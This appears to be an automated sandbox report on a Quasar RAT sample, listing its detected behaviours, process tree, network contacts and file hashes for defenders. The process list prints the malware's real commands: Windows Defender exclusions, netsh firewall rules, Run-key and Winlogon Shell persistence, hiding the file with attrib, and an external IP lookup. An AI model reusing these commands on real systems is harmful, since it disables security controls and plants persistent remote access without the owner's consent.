Analysis Overview
SHA256
4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472
Threat Level: Known bad
The file 4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472 was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Modifies Windows Firewall
Executes dropped EXE
ACProtect 1.3x - 1.4x DLL software
Loads dropped DLL
UPX packed file
Unexpected DNS network traffic destination
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 05:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 05:17
Reported
2023-08-01 05:20
Platform
win10-20230703-en
Max time kernel
41s
Max time network
155s
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472.exe
"C:\Users\Admin\AppData\Local\Temp\4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 7
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 8 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 8 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 94.131.105.161:12344 | | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | | tcp |
| NL | 94.131.105.161:12344 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvgqgjfe.uvp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 140c242bd2084887f7d9651edbef1b27 |
| SHA1 | ab5520fb33addfa8c7aab19518d2ace1707caffc |
| SHA256 | d667e58b243474e6c2e85596ce24ac7fd1c35a0d344e48ee018ecbda0dc16bc5 |
| SHA512 | fff13910595bfe3341b6afe14eb6b077f0ecfe55097140e9b5433faccf74c141816b3e4689d8d66841ac8ba0496b86ffbfa3d290c3ac94546f138480ae5bbdc1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f924404db3e2f377ca972385a606920 |
| SHA1 | 0f57a187132a09f3a448d6d8f2c6d3640b83718a |
| SHA256 | c46fe59bd9d675f65200e3ccfb02105b398e4dc48bcb80537a1a37e34fbf08dc |
| SHA512 | 39a0bdc0aa8accd2b35b0755c0e835a286bb333dc90cb883e7391aabec0b034a9894e109cf05f082828a8f03819638595e48887bb6ce897def31cdafc62168b5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7408030782acfd8cd87d99d135f7e34a |
| SHA1 | 4e980bf53204f484bac906d577575f6314b384da |
| SHA256 | 5cd523c82b420b48cb57e87bfa2bccf8aae4d6ffa3ac41ccb8ac4dc2b41cde7d |
| SHA512 | 4effb71ac7f092c20eabedce0a3680487291a1ac5924fb86919addd0e62e7344a582bb2d67f806fa716bcf341b3d5be57e948d6ea238be6af84dc1a0057a20e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 94e4c3d058c2a10af449595de8ec9865 |
| SHA1 | 2ace3ce9aa09aa61199f5259dc9cca42eded4ef7 |
| SHA256 | 960ee2c01171da4172150101d7a7356932cbf3fa27ac463719dbc41fff25a50c |
| SHA512 | f3fdd310cb85d6a8baff0ac016c7d79323e390ea15486becdb708deccd4688985c4fb950b667cc2c5e54e40892c6cea065666c7b73f6e651d8a63142d76ebe33 |
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | f1b4b270779776ce5d8829f66934deac |
| SHA1 | 5df708a5921807b981739ba11d134fe14a7ef309 |
| SHA256 | a58064e5e3c5da62cb678d13ac7cd11632999c593b637598f261bea00f415236 |
| SHA512 | 5a9c57f378adc02acface706849277f2f7a89269c51b9f56158e062ed4df92edd917fa2f2a0e745906db25799fbe245776875892d1d33e3855304ec03546c9e5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 680b400dbdbe9b5d2e86ffa228a7303d |
| SHA1 | 7b6d9849a15a766921b7e30414c65bf848155c07 |
| SHA256 | e09aa7ec2e2a586aaf56d4fa1a3dac72e01122768d6c5fb275fac323878a35e9 |
| SHA512 | 508b7be971c2388644b875b96e3b43624f084d531719da6e669f674f0600c0ba39f70b7267b5c632e32ffa1c7641a74220e38b315b0bf574232b2cffa9aa6984 |
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 124cb455e308bd9e6f777782ecce3fea |
| SHA1 | c5897da0e83b95ceefc533099e8ea3f8f91b98f6 |
| SHA256 | 1dac1823911e8ef1bdfba39d3e6ac907656d87e9bbd6fecb550baf822e7fc7dd |
| SHA512 | 0d292b685518222abbffb23d7c48a93bb71a0be0a434f07fb3ce097c0df555c6f304741a572a5501ed1845960e7335aa38555509ff4f412267d869e1a3f39258 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
| MD5 | 0e62fbabdaac7d486b9b47b3624a0816 |
| SHA1 | d239009ce40d38db653410f52d0a257f5d3c9224 |
| SHA256 | 3e75f9698ed8461fb828254c9b210822b8cb4731d35fd5bd1f05fc8bb15caf71 |
| SHA512 | a0d0b713c499a5cb335195a0f3aa5dda886a2f6a712ce7f50334135a075d726be71d124b938e5fb25fe840acea107125002fb11e6aea39a3a963e6d8c7ca8f75 |
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | a51b281e5e8c49c56887a730684c605b |
| SHA1 | 18261b209a0221e94da5b3c3561503e5c86a1f13 |
| SHA256 | a49f03175d0d3f03704b42ef45425d89c6e5d52284cf1077e28e773e2f2e4072 |
| SHA512 | 17dd01d2cbe06c6ca17efe448c745b9227bff5fe5676a905114927c39eb01b11647bd46706ac99beebcafcb1a473489e01850bb88b31f90853e426a523725280 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9e104e9aa0cfdec0753de24cbe3f587b |
| SHA1 | f63b8d0b29c65e518be6a9412e7499c9de11be78 |
| SHA256 | 59a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f |
| SHA512 | 8253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b |
C:\Users\Admin\Music\rot.exe
| MD5 | 02eda40e5f4eb5cf877a11493f0e3bbc |
| SHA1 | 8e18a894239260711faa0de0304306efee987123 |
| SHA256 | ab76dba42fc2346e3b19d424a9c4fbd9fbcbb02f347b0b0d57c67a29a8da7384 |
| SHA512 | b927670886c823b7fdd62606189aac56e6c2ab28490374c6f21f07c3706afad4ecc8eb24e7556f231461a8ed1942ceb8293f6701b4315660f7f3a40105e298ab |
C:\Users\Admin\Music\rot.exe
| MD5 | 110c85e95a13168ae418227a2beb2b9b |
| SHA1 | d3e13797aa06638b683d988475d55cfa9a2ff1f3 |
| SHA256 | f40fcfd3fbc91cc26ebff824ad7eff3b913fec7a62e8c0e64082bd987af2e13e |
| SHA512 | bffceea5e8c1033e80832f007fe5fac9be5936c4ab27d64ca05cfe2793c39fb56960bacb7407dfd89d25ebc0ee1d3bd9a241a7d6df220c7783ed65dae49056ab |
C:\Users\Admin\Music\rot.exe
| MD5 | fe6babf8c96d84abcaf0588c0714e4c0 |
| SHA1 | 772e1c16d7dde390c8597c1c449ce9884e1f288a |
| SHA256 | 506731bec35b2a8441b6f81b0f09e83b2823962fc74226a522b923a6ac7aa391 |
| SHA512 | 9c2fb7af54c8f7e2935c4228d5cee4508044aacd29ecf15c995c84c1a76ef1fb44411c625299d3dc9a666e7b099ad10a6892a02f7b681380177dfacd1ae1ad3b |